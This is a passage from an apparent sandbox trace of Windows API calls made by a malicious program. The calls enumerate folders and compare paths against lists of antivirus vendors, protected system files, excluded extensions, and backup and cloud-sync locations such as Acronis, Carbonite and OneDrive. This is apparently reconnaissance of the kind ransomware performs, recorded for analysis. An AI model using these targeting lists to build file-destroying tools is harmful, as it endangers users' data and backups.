(x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0058.439] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ES_ES\\SERVICES\\") returned 0x46 [0058.439] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.440] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.440] CharUpperBuffW (in: lpsz="DEXShare.asfx", cchLength=0xd | out: lpsz="DEXSHARE.ASFX") returned 0xd [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 1 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DEXSHARE.ASFX", cchCount2=13) returned 3 [0058.441] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.441] CharUpperBuffW (in: lpsz="Services.asfx", cchLength=0xd | out: lpsz="SERVICES.ASFX") returned 0xd [0058.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ASFX", cchCount2=4) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SERVICES.ASFX", cchCount2=13) returned 3 [0058.443] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.443] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.443] CharUpperBuffW (in: lpsz="Spelling.ESP", cchLength=0xc | out: lpsz="SPELLING.ESP") returned 0xc [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SPELLING.ESP", cchCount2=12) returned 1 [0058.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SPELLING.ESP", cchCount2=12) returned 3 [0058.444] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.444] CharUpperBuffW (in: lpsz="updater.ESP", cchLength=0xb | out: lpsz="UPDATER.ESP") returned 0xb [0058.444] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.445] CharUpperBuffW (in: lpsz="Weblink.ESP", cchLength=0xb | out: lpsz="WEBLINK.ESP") returned 0xb [0058.445] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.445] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.445] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.445] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.446] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.446] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", 